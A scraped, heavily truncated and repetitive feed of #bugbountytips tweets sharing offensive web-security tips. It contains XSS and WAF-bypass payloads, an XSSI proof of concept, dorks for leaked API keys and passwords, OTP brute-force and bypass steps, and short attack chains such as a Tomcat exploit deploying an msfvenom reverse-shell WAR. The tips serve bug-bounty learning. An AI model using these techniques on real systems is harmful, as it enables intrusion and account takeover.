RT @hacback17: It was a fantastic session loaded with lots of live examples. Thank you
Video: https://t.co/hu5Qw0J18i
Slides: https://t.co/pOIyo27sbC
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @th3hokag3: Bug Bounty Tip:
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0
Bug Bounty Tip:
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0
RT @trbughunters: ️Find Passwords, Exposed Log Files with Google Dorks ️
️️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!
https://t.co/qKr1pPXn2t
Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️
Hope it helps :)
#bugbountytips #bugbounty
RT @intigriti: How can you leverage out of scope domains without breaking a program's
@healthyoutlet enumerates OOS subdomains & creates a wordlist to use for in-scop
RT @AldenAous: 🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @hackd00r: Subscribe to our Telegram Channel for Hackdoor Cyber Security Events a
🤖🤖🔥🔥👾👾👇👇👇
https://t.co/sqSFXdEOmM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
RT @securestep9: Stuck at home due to Coronavirus? It is a great time to learn about fin
Here's a great collection of write-ups collected by @PentesterLand from 2012 to 2020:
#BugBountyTips
#BugBountyWriteups
https://t.co/PKKHWJig9D https://t.co/QDo79j0nTP
RT @hsakarp_ilajna: comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
RT @KomodoGT: https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #open
RT @D0rkerDevil: #bugbountytips
webarchive > found email change unconfirmed link > checked source > found e
at this point i cannot change the mail of he user as it won't be good for the user
reported
#bugbounty #security
RT @farah_hawa01: NEW VIDEO: In this video, I explain how JWTs work and how to att
https://t.co/RR4Dmclkyw
RT @micha3lb3n: Just gimme a list of urls or a url, I can do the following :
1. Extract all the hidden endpoints from the source.
2. Filter out live domains
3. Brute force endpoints with a word list.
And all these really fast
says SourceWolf.
https://t.co/yDS86kXO3h
{..}
#bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
#programfolback #tutorial #code #opensource
RT @SalahHasoneh1: ️Top 10 - GitHub Dorks for Finding API Keys ️
️️
Rebuilt in a better way
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @roughwire: Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-ad
Triaged with "High" instead of "Critical" . Don't know what is wrong !
#bugbountytips Tweet has tip as well :D
RT @laud3b: Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @D4Vinci1: Just published a script that fingerprint BigIP servers in a given list of dom
link:
https://t.co/ua0FR2xwrm
#bugbounty
#bugbountytips
#Pentesting #bigip #F5 https://t.co/OqbegbmIOF
RT @manas_hunter: Bypassing 2FA with CSRF.
Apply this for easy bounties:)
#bugbountytips https://t.co/yKdQmwloNq
RT @K4r1it0: shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,po
#bugbountytips
#bugbountytip https://t.co/nMahaMlFTt
RT @intigriti: Want to find critical bugs by changing a single header? Do just like @hacke
RT @_mkahmad: Account Takeover by JWT Token forging by me :) #bugbountytips #bu
RT @fuxksniper: GraphQL — Common vulnerabilities & how to exploit them:
https://t.co/gFbaCcFUhD
Understanding Graphql :
https://t.co/v57mt8ZAsf
Some good graphql stuff
(Not by me)
#bugbountytips #bugbountytips
RT @D0cK3rG33k: GiHub Dorks for Finding API Keys, Tokens and Passwords
api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth
#bugbountytips
RT @AldenAous: Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/hhKW
RT @TheHackersNews: Watch Out 🔥
Hackers are abusing #Google Analytics service to bypass CSP web-security feature and
Learn how it works — https://t.co/82qxzATWCR
#infosec #cybersecurity #bugbountytips #bugbountytip https://t.co/R5XyQwU5mk
RT @intigriti: Excellent e-mail address payloads by @securinti! 🤯
Rewatch "You've got pwned: exploiting e-mail systems" at #NahamCon here: https://t.
RT @cry__pto: Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @ADITYASHENDE17: https://t.co/kotXpSr6G8 /plugins/servlet/oauth/users/icon-u
I always fuzz target name with my site name to gain SSRF AWS metadata.
Thanks to @D0rkerDevil SSRF write-up.
Remaining Google it
#bugbountytips #kongsec
RT @daoud_youssef: one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @pdiscoveryio: #httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
https://t.co/baW40ThDCi
#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu
RT @mirhatx: Bash code for manuel subdomain takeover testing:
cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
RT @0x0Cj: Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
RT @safe_buffer: Wait !! Are you serious? are you going to help ppl to learn smt could re
RT @AldenAous: 🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @HusseiN98D: As per the vote results, here you go!
A cool XXE resulting from a SSRF found on local company website during a pentest. DMs
#bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
How to Bypass The Rate limiting✌️✌️
Add this header in to the post request with an IP address.
X-Forwarded-For: (Any IP Address )
#bugbountytips #bugbounty #vulnerability #Hackers #exploit
RT @ITSecurityguard: Massive shoutout to https://t.co/ZgPbPhhgY5 for creating https:/
it is exactly what most of you people are looking for 😍
#recon #bugbountytips #BugBounty #AutomationAnywhere
RT @heald_ben: Easy way to find exposed production code:
1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain”
2. Even if login is required, try the
“/snippets” endpoint.
3. View internal source code snippets.
#bugbountytips #bugbounty #bugbountytip
RT @11xuxx: RCE on big company
1. subdomain enum
2. used "ffuf" and found tomcat on ";/..;/manager"
3. weak cred (used hydra)
4. "/manager/html" blocked, "/manager/text" was not
5. used "msfvenom" and crated reverse shell war
6. used "curl" and deployed the war file
7. rce!
#bugbountytips https://t.co/AfCqUVXyuK
RT @_Rutik_Sangle_: Finally today I completed the #100daystolearnandimprove challe
journey ahead.
Thanks to all
RT @HusseiN98D: An overview of what I did for my recent $10 000 bug. Always go for th
RT @roughwire: Running @pdnuclei on multiple template and don't want to see informat
cat nuclei-out.txt | grep -v -e templateid1 -e templateid2
#bugbounty #bugbountytips
Running @pdnuclei on multiple template and don't want to see informative or low impac
cat nuclei-out.txt | grep -v -e templateid1 -e templateid2
#bugbounty #bugbountytips
Subscribe to our Telegram Channel for Hackdoor Cyber Security Events and Webinars In
🤖🤖🔥🔥👾👾👇👇👇
https://t.co/sqSFXdEOmM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
I just published How I was Able To bypass Cloudflare WAF https://t.co/YBl9gMLUB0
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
Sublist3r is a tool designed to enumerate subdomains of websites. It helps penetration t
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @AmitMDubey: This little command will get all the Wayback endpoints to compare it
Tools -
waybackurls & unfurls by @TomNomNom
httpx by @pdiscoveryio
(I know it can be further optimized)
#bugbounty #bugbountytips #bugbountytips https://t.co/oBT5LNjmk6
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/othzLzOqx1
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ZVrslIQtoM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @11xuxx: XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!
Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change th
#bugbountytips https://t.co/37JBcasx8h
Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @pdnuclei: Here is a #tip for using nuclei for a given list of subdomains, Nuclei accep
#bugbountytips https://t.co/C0pZpelj8z
RT @F3RR4R1_R3D: Why am i just now reading this? Anyways good recon methodology
RT @KomodoGT: I had some spaghetti last night this is what I found this morning. #bug
I had some spaghetti last night this is what I found this morning. #bugbountytips https:
RT @rnd_infosec_guy: #bugbountytip
Don’t propagate bug bounty as a reasonable job model. It is the same as saying everyon
#bugbountytips #infosec #BugBounty
RT @ssh0x00r: does we need to know JavaScript to get started in bug bounty ?
#bugbountytips #hacking #infosec #hackerone
does we need to know JavaScript to get started in bug bounty ?
#bugbountytips #hacking #infosec #hackerone
RT @chiraggupta8769: Awesome Tip By @intigriti And Tool By @sratarun #bugbountytip
RT @_YashGoti_: Need to automate your recon process with telegram chat here you go.
#bugbountytips
#recon
#automate
https://t.co/ZGU4fp0W5q
RT @krizzsk: A small but effective way to recon and get internal subdomains to increase
Why am i just now reading this? Anyways good recon methodology and nice #bugbount
RT @dynamicCISO: With @HarshBothra_, we have delivered a great session on #Offensi
Video: https://t.co/YPfGj2ppYE
Slides: https://t.co/2ntCYwZYwH
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @HackerOn2Wheels: Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
RT @Ranger_one_: Great Resource for Template Injection!
https://t.co/gT3WvtEi3I
https://t.co/rVSOBfkZUu
https://t.co/CZsbChIJ7a
#bugbountytip #bugbountytips #bugbounty
#bugbountytips
webarchive > found email change unconfirmed link > checked source > found e
at this point i cannot change the mail of he user as it won't be good for the user
reported
#bugbounty #security
RT @Faeeqjalali: OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
RT @hsakarp_ilajna: Things you should Gather: #Osint :
metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version
##bugbountytips #bugbounty
🧮 ️Top 25 Local File Inclusion (LFI) Parameters ️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
⛓️Get Reflected XSS within 3 minutes ⛓️by:@gkhck_
https://t.co/ZSGoyAvqdo
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @ja1sharma: Bash Script to scrap spring applications via Shodan and enumerating se
Usage: ./springShodanBash.sh <redact>
Output: <redact-Spring_FFUF.txt>
>:https://t.co/zFNiw1F1SD
Any suggestions are welcome.
Credit: @K4r1it0 @Madrobot_
#bugbounty #bugbountytips https://t.co/YWVbXwACTN
It was a fantastic session loaded with lots of live examples. Thank you so much, @harsh
Video: https://t.co/hu5Qw0J18i
Slides: https://t.co/pOIyo27sbC
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @Virdoex_hunter: Bug bounty fast hunting find all subdomains using all tools and the
It was great to have a talk with @dynamicCISO. In case if you missed, find my slides &a
Slides: https://t.co/d77RbZXwqG
Stream: https://t.co/vrILyaZoLj
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
With @HarshBothra_, we have delivered a great session on #Offensive #Recon. The aud
Video: https://t.co/YPfGj2ppYE
Slides: https://t.co/2ntCYwZYwH
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @_ayoubfathi_: Ran into an API subdomain with an empty response?
You may get lucky and fetch the full API spec by hitting the following endpoints:
/swagger-ui.html
/swagger/swagger-ui.html
/api/swagger-ui.html
/v1.x/swagger-ui.html
/swagger/index.html
...
#bugbountytips #bugbounty #hackerone
RT @chiraggupta8769: Top 25 Remote Code Execution (RCE) Parameters by @trbughunt
#bugbountytips #bugbountytip #bugbounty https://t.co/XKItUZGzAx
RT @harshbothra_: Easily find exposed secrets from Github and Identify manually if they
#bugbountytip #bugbountytips #bugbounty #security https://t.co/vYPGFPW2lF
Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/hhKW
RT @th3hokag3: BUG BOUNTY TIP:
#bugbountytips #bugbounty #bugbountytip #cybersecurity #infosec https://t.co/QpJa
RT @cyanpiny: #bugbountytips https://t.co/sd2j3XrAoH
#bugbountytips https://t.co/sd2j3XrAoH
CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @SalahHasoneh1: ️Manipulation of email by Latin letters ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
Bash Script to scrap spring applications via Shodan and enumerating sensitive endpoints
Usage: ./springShodanBash.sh <redact>
Output: <redact-Spring_FFUF.txt>
>:https://t.co/zFNiw1F1SD
Any suggestions are welcome.
Credit: @K4r1it0 @Madrobot_
#bugbounty #bugbountytips https://t.co/YWVbXwACTN
What I consider the top two learning and testing books for #pentesting and #bugbounty
#cybersecurity #bugbountytips #penetrationtesting
https://t.co/d9bPjpqcxH
RT @AldenAous: Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
https://t.co/fPs3KiXFL0
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @ehsayaan: If you found some api key or secret key then these are some tips to Esca
#BugBounty #bugbountytips https://t.co/5NjdDA1D4D
RT @pwn0sec: https://t.co/D5AYcIaVmU
#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter
https://t.co/D5AYcIaVmU
#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter
Great Resource for Template Injection!
https://t.co/gT3WvtEi3I
https://t.co/rVSOBfkZUu
https://t.co/CZsbChIJ7a
#bugbountytip #bugbountytips #bugbounty
RT @chiraggupta8769: A small Burpsuite trick which helped @amitmdubey to find Blind
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hit
#bugbounty #bugbountytips https://t.co/KN0QuuZkyO
RT @faizalabroni: 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found https://t.co/dxxS1HALdy
3. clone & use https://t.co/87gxJisJNN
4. ./svn-extractor.py --url https://t.co/YrfE7sv51h --match database.php
5. result in output dir and just open it
#bugbounty #bugbountytips https://t.co/nNVCsstLny
RT @terjanq: I recently discovered a fancy way to execute arbitrary XSS without parenth
https://t.co/K0ebjvpmxq
#javascript #bugbountytips #xss https://t.co/7848wYvnU2
RT @r00t98: Bypass rate limit to account takeover
1. Server limited brute force OTP by ip.
2. Install & config ip rotate(burp suite extender).
3. Send password reset code.
4. Brute force OTP with intruder.
5. Change password.
#bugbountytip #bugbountytips
RT @bountyhunter_fr: Here is a way to escape a restricted shell in linux
#bugbountytips
What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb
comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
Things you should Gather: #Osint :
metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version
##bugbountytips #bugbounty
⏰Reflected XSS on Sony with Google Dork & Akamai WAF Bypass ⏰
https://t.co/raJdKzYbqt
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @hsakarp_ilajna: My #twitter and #linkedin feed is flooded with Bug Bounty tips Tw
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @BugBountyRecon: What should you look for when attacking OAuth2?
A nice overview: https://t.co/TtbQrQmuBS
#bugbountytips #BugBounty
RT @arkadiyt: I've added Intigriti and YesWeHack support to my bounty-targets-data cr
Happy hunting: https://t.co/IPZbv0yBUs #bugbounty #bugbountytips
RT @AldenAous: ️Ways to bypass rate limit ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @trbughunters: ️Top 25 Remote Code Execution (RCE) Parameters ️
️️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | #follow Java
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
RT @m4ll0k2: https://t.co/eD8AUajPQw - Simple Python tool for find a unique words in
#bugbountytips https://t.co/TIjT5Trvkd
RT @taaminz: Access to internal company info
1. Find an internal dev domain using https://t.co/CbAoq9VFF4
2. Subdomain enumeration on internal domain
3. Find internal API subdomain
4. API key and endpoint in javascript file
5. Access to internal info
#bugbountytips #bugbounty
RT @pdnuclei: #oneliner
✅ Subdomain enumeration
✅ Full port scan
✅ HTTP web server detection
#security #bugbountytips #portscan #subdomain #chaos https://t.co/Xqm5MZdnuY
My #twitter and #linkedin feed is flooded with Bug Bounty tips Tweets. I am really fee
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @chickflow0: when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...
#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #
RT @BeingjokerMeme: JSON Web Tokens | Authenticating single page apps using JWT |
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...
#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #
RT @GainSec: How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
https://t.co/OCOXHP5m3Z
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
https://t.co/OCOXHP5m3Z
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How to Answer tricky Javascript Interview Questions | #follow Javascript https://t.co/c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @MeetAn0nym0us: Just published an Article on Android Apps Pen-testing.
Don't forget to share your thoughts on it.
Thanks!
https://t.co/a1pno2oioa
#BugBounty #bugbountytips #TogetherWeHitHarder #hackerone #ItTakesCrowd https:
RT @naglinagli: Google dork for CVE-2020-3452
'inurl:logon.html "CSCOE"'
(It will find exposed Cisco SSL-VPN domains, not 100% of them are vulnerable, but mos
After reaching a login page, try one of @aboul3la POC's
#bugbountytips https://t.co/GDXV3oZDwA
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT https://t.co/P
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT https://t.co/P
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @black_hat_india: Disclosing user's sensitive information like phone number, tokens
Captured login request via BURP.
/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]
#bugbountytips #infosec
RT @black_hat_india: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "application.wadl" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips https://t.co/unotYtxeWY
RT @dwisiswant0: FinDOM-XSS - Find for Possible DOM Based XSS Vulnerability
https://t.co/Q7MU6pgIsU
Inspired by @dark_warlord14 by JSScanner tool, and @aslanewre with the possible patt
#bugbounty #bugbountytips #infosec https://t.co/jcSd4vtGpD
RT @11xuxx: Twig SSTI
1. Submitted {{7*7}} and received "you password is: 49"
2. Tried "registerUndefinedFilterCallback" func, it was blocked by Imperva WAF https://
3. read Twig source code and found "registerUndefinedFunctionCallback"
4. WAF bypassed and RCE!
#bugbountytips https://t.co/hXtPdo9Kkp
RT @black_hat_india: subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DO
Some crazy oneliners possible for subdomain discovery
#bugbountytips
RT @Yumi_Sec: An interesting trick: you can bypass a WAF during a XSS attack on ASP(d
#BugBounty #BugBountyTips #InfoSec
(Credit to Acunetix)
Full article: https://t.co/Eq2nl9cyQ6 https://t.co/yy3tuRHDbq
RT @iambeingjoker: JSON Web Tokens | Authenticating single page apps using JWT | Ho
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @pwn0sec: Pwned @andripwn - Bypassing WAF XSS with language
/></noscript></form><script language="javascript">window.alert(1
#xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting https://t.co/3fJm
RT @andripwn: Bypassing WAF XSS with language
/></noscript></form><script language="javascript">window.alert(1
#xss #bypasswaf #bugbountytips
RT @andripwn: Waf Bypassing SQL-Injections DIOS
Leads to Recon Find Cpanel Login
#bugbountytips #bypassWaf #hackerone https://t.co/T317tT3gkb
JSON Web Tokens | Authenticating single page apps using JWT | How to use https://t.c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
JSON Web Tokens | Authenticating single page apps using JWT | How to use https://t.c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Hxzeroone: #Bugbountytips
If you’re testing a website which lets you use your account on Xbox/Setup Tv.Visit hxxp
https://t.co/gnZry4m4Wl
RT @trbughunters: ️Top 25 SQL Injection Parameters for @trbughunters ️
️️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @trbughunters: ☠Top
️ 25 Server-Side Request Forgery (SSRF) Dorks
☠️
Note: The popularity of dorks can vary.
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @andripwn: Bug Bounty GitLab : Stored XSS in Wiki pages
Status : Patched
Writeup's here::
https://t.co/9ayVoenny5
#bugbounty #bugbountytips #hackerone #gitlab
RT @xalerafera: If you find the host hosting the WordPress CMS, then try to see, if xmlrp
Then, through the PingBack function, you can get Blind SSRF)
#bugbounty #hackerone #bugbountytip #bugbountytips https://t.co/82mOpzrXCo
RT @bendtheory: just learned about ffuf’s response size filter -fs
super useful when a site returns 200 for bad paths instead of 404’s. you can even set a r
friendship ended with dirbuster
now ffuf is my best friend
#bugbountytips
RT @jdksec: Need a quick way to request 1000's of URLs in burp without crashing your b
cat yahoourls.txt| parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
#bugbounty #bugbountytips #bugbountytip https://t.co/61yAw3qCLk
RT @Th3G3nt3lman: P1 of the day on @Bugcrowd :
1- https://host =>403 forbidden
2- https://host/app =>Redirect to corporate SSO
3- https://host/app/main.js =>IP:8005 and Api_key
4- https://IP:8005/ => https://IP:8005/swagger/ui/index#/Admin
5- Use key in swagger=> Info Disclosure
#bugbountytips
RT @IfrahIman_: Want to find some new subdomains for your target?
Use SecurityTrails API 🔥 to enumerate.
#bugbountytips https://t.co/vHq8M1wBC5
RT @bendtheory: XSSI example PoC to fix JS undefined/type errors
<script>
x = function(y, z) { };
prof = {'manager': {'load':null, 'fn':x}}
prof.manager.load = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://t.co/kDPMJMFetz"></script>
#bugbountytips
RT @bendtheory: #xss payload for when
1. a parameter is reflected in javascript
2. it’s being inserted into the DOM via innerHTML
3. HTML encoding and not Javascript encoding is used
4. WAF blocks common payloads
\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here
#bugbountytips
RT @laud3b: Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @mase289: I just published The $1,000 worth cookie
A story of DOM XSS in https://t.co/GqkQXyBLmG
https://t.co/kYEijPwppN
#BugBounty #bugbountytips #xss
RT @AldenAous: - SQL'injection with WAF ByPass
If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/HNM
RT @chiraggupta8769: Account Takeover By JWT Token Forging By @_mkahmad
#bugbountytips #bugbounty https://t.co/H4uup4L6iE
RT @trbughunters: ⛓️Get Reflected XSS within 3 minutes ⛓️
